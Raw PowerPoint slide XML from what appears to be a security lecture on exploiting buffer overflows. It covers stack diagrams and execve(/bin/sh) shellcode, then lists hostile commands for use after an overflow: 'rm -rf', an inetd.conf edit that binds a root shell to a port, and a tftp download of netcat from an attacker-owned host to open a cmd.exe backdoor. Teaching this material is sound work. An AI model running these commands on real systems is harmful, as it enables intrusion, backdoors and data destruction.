            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="1455738"/>
            <a:ext cx="227013"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b="1">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176148" name="Text Box 20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="4922838"/>
            <a:ext cx="227013"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b="1">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176149" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="1676400"/>
            <a:ext cx="0" cy="1143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50" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1747838" y="3000375"/>
            <a:ext cx="1528762"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Buffer 1 Space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>is overwritten</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176151" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1701800" y="3886200"/>
            <a:ext cx="15954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ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Return Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>is overwritten</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176152" name="Text Box 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="3108325"/>
            <a:ext cx="15621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Machine Code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>execve(/bin/sh)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176153" name="Text Box 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3487738" y="3876675"/>
            <a:ext cx="15176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ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>New Pointer to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>exec code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176154" name="Line 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="4191000"/>
            <a:ext cx="381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55" name="Line 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="5562600" y="3200400"/>
            <a:ext cx="0" cy="990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76156" name="Line 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5181600" y="32004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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="90759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AA0-D230-294D-A011-2BD70FDF32FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="609600"/>
            <a:ext cx="7010400" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Buffer Overflow Attack with a C Program Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F36C956-C185-E245-B70B-577F86689E62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1371600"/>
            <a:ext cx="3360278" cy="5334000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3284033C-E8D0-1344-87BE-9E22B5FF1265}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4654216" y="1371600"/>
            <a:ext cx="3334550" cy="2340810"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72A7BE39-AAA4-2E4E-BAE8-2DFB099C4957}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4654216" y="3997157"/>
            <a:ext cx="3334550" cy="2559619"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="279340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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600"/>
              <a:t>Exploiting Buffer Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102403" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="1371600"/>
            <a:ext cx="7162800" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Two Options:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Use an off-the-shelf exploit someone else already created</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>The script kiddie approach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Very common</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Admins may have already patched against it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Create a new exploit for a new vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Admins likely won</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0"/>
              <a:t>t know about it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Very nasty stuff! </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="423299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sz="3600"/>
              <a:t>Now What?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103427" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="1524000"/>
            <a:ext cx="4572000" cy="2209800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3600" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3600" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103429" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1600200" y="1447800"/>
            <a:ext cx="6324600" cy="4656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128"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>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buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>So, you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP"/>
              <a:t>ve smashed the stack, and can execute an arbitrary command …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>What to execute?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>On UNIX, shells are very popular</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>On Windows, control is often sent to a DLL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>What do you feed the shell to run?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Pure maliciousness: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>rm –rf *.*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="55009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609600"/>
            <a:ext cx="6858000" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Create a backdoor Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>Inetd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166915" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="1212850"/>
            <a:ext cx="6950075"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Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685800" indent="-22860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buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Send a command in the buffer overflow that edits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>inetd.conf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>On UNIX machines, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>inetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> listens for incoming connections on the network and spawns a process to handle the request (e.g., telnet, ftp, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Send a command like:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> –c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>echo 9704 stream </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>nowait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> root /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> –I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> &gt;&gt; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>inetd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>killall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> –HUP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>inetd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Will make </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>inetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> listen on TCP 9704 and spawn a shell to whomever connects there</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="405051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609600"/>
            <a:ext cx="7162800" cy="457200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Buffer Overflows and Backdoors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104456" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="1295400"/>
            <a:ext cx="76200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128"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685800" indent="-228600">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dirty="0"/>
              <a:t>If I discover a buffer overflow that I can trigger, I might:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Overflow the buffer and have it to execute the following commands:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>tftp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>another_machine_I_own</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>nc.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> –L –p 8080 –e cmd.exe (or any other port I can get to)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Voila, I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t> got a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t> listener backdoor that I can use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
